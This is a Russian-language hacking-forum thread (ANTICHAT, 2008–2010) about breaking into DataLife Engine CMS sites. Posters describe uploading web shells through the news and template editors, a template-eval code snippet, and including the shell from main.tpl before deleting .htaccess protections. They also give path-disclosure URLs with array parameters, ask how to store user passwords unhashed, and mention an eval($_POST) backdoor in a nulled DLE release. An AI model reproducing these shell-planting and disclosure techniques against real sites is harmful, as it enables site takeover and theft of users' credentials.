ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
24.06.2008, 02:51
|
|
Постоянный
Регистрация: 26.03.2008
Сообщений: 311
Провел на форуме:
3799424
Репутация:
479
|
|
Сообщение от Ar3s
Попробуй через редактирование шаблона сайта.
Там можно вставлять php код в текущий шаблон ИЛИ есть кнопочка [создать новый]. Через нее можно тупо создать шелл. А потом в своих настройках отображения сайта выбрать вновь созданную тему.
Вообщем как-то так. Экспериментируйте.
чтобы php код исполнялся в шаблонах (tpl)
надо:
В файле index.php, заменить
на
PHP код:
function incphp($str)
{
$a = explode('<?', $str);
echo $a[0];
for ($i=1; $i<sizeof($a); $i++)
{
$b = explode('?>', $a[$i]);
eval($b[0]);
if (sizeof($b)>1) echo $b[1];
}
}
incphp($tpl->result['main']);
Теперь Вы можете в любом тексте между тегами <? ... ?> выполнять PHP код.
(с) dle-news.ru
так что облом
---------------------------------------------
загружать шелл через добавление новости тоже не получается.
1) не отображается полный путь файлы\а(шелла) т.к при загрузке скрипт сам дописывает цыфры перед файлом.
2) в папке uploads/files (куда складываются файлы) лежит .htaccess в котором:
PHP код:
<FilesMatch ".*">
Order allow,deny
Deny from all
</FilesMatch>
<FilesMatch "\.(avi|mp3|mp4|flv|swf|wmv)$|^$">
Order deny,allow
Allow from all
</FilesMatch>
DLE 7.0
Последний раз редактировалось #Wolf#; 24.06.2008 в 02:56..
|
|
|
16.01.2009, 08:15
|
|
Постоянный
Регистрация: 26.03.2008
Сообщений: 311
Провел на форуме:
3799424
Репутация:
479
|
|
Последний раз редактировалось #Wolf#; 25.08.2009 в 12:20..
|
|
|
|
10.02.2009, 15:54
|
|
Постоянный
Регистрация: 26.03.2008
Сообщений: 311
Провел на форуме:
3799424
Репутация:
479
|
|
раскрытие путей
http://host.ru/engine/print.php?do=static&page[]=paramparam
результат
Warning: mysql_real_escape_string() expects parameter 1 to be string, array given in [PATH]/engine/classes/mysql.class.php on line 162 Невозможно загрузить шаблон: info.tpl
UPD
http://host.ru/engine/rss.php?subaction=allnews&user[]=admin
UPD
для тех у кого есть доступ в админку(журналисты, модераторы и выше)
http://host.ru/admin.php?mod[]=main
(c) #Wolf#
ps
http://dle-news.ru/bags/v75/570-nedostatochnaya-filtraciya-vxodyashhix-dannyx.html
кандоны( уже патч выпустили(
Последний раз редактировалось #Wolf#; 18.02.2009 в 16:16..
|
|
|
|
10.01.2010, 11:25
|
|
Новичок
Регистрация: 09.01.2010
Сообщений: 1
Провел на форуме:
7416
Репутация:
0
|
|
Сообщение от Getozz
Мой способ самый простой. заливаете шелл через новость. ищете в антивире . и в маин.тпл или другой шаб через админку прописываем. include('/uploads/files/shell.php');
а дальше заходим в шелл и быстренько удаляем файл хтасес из директории шелла(аплоадс и файлс).
дальше удаляеш инклуд из шабла. и с чистой душой радуемся
Проинклудил я main.tpl, а как зайти в шел не понятно. Объясните нубу, пожалуйста! 
|
|
|
|
12.01.2010, 20:07
|
|
Новичок
Регистрация: 31.03.2007
Сообщений: 3
Провел на форуме:
25785
Репутация:
0
|
|
Сообщение от Getozz
Мой способ самый простой. заливаете шелл через новость. ищете в антивире . и в маин.тпл или другой шаб через админку прописываем. include('/uploads/files/shell.php');
а дальше заходим в шелл и быстренько удаляем файл хтасес из директории шелла(аплоадс и файлс).
дальше удаляеш инклуд из шабла. и с чистой душой радуемся
а для этого не нужно в index.php менять строчку:
echo $tpl->result['main'];
на
eval (' ?' . '>' . $tpl->result['main'] . '<' . '?php '); ??
или я что то не правильно понял ? объясните кто нибудь...
и ещё один вопрос, может кто знает, что нужно сделать, чтобы пароли при регистрации сохранялись в базу - как есть, без md5 кодирования ?
|
|
|
|
11.01.2010, 22:50
|
|
Новичок
Регистрация: 08.01.2010
Сообщений: 2
Провел на форуме:
10732
Репутация:
-5
|
|
Подскажите, что можно сделать, имя доступ к админке в DLE 8.0., если слить базу мешает не выставленные права 777. Есть в этой версии способы залить шелл?
|
|
|
|
26.04.2010, 01:55
|
|
Новичок
Регистрация: 30.11.2009
Сообщений: 9
Провел на форуме:
70191
Репутация:
0
|
|
Такой вопрос, залил шелл.
А как его юзать? Фиг его знает как искать етот шелл.....  |
|
|
|
30.04.2010, 11:09
|
|
Познающий
Регистрация: 18.10.2009
Сообщений: 80
Провел на форуме:
1180165
Репутация:
11
|
|
Сообщение от sir95
Такой вопрос, залил шелл.
А как его юзать? Фиг его знает как искать етот шелл..... Юзай антивирус в админке, он покажет назву шелла
|
|
|
|
30.04.2010, 14:17
|
|
Новичок
Регистрация: 12.03.2010
Сообщений: 13
Провел на форуме:
29188
Репутация:
0
|
|
Сообщение от TANZWUT
Komyak, скорей всего Rew слил не с сайта M.I.D-Team
Да я сливал dle не сайта M.I.D-Team а с какого то сайта по dle где есть модули и хаки для dle.
Но что релиз от тимы M.I.D-Team там было это точно написано и папка там называлась DataLife Engine v.8.5 Nulled by M.I.D-Team после распаковки архива.
Значит от ихнего имени кто - то дле null распространяет с бэкдор . eval() через $_POST. Только теперь этот бэкдор
в keywords.php.
http://php.net/manual/en/reserved.variables.post.php
http://php.net/manual/en/function.copy.php
Создавай форму(html) или просто курлом посылай.
Спасибо почитаем.
Что с рангом я вам плюсь добавил а его не видно?
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
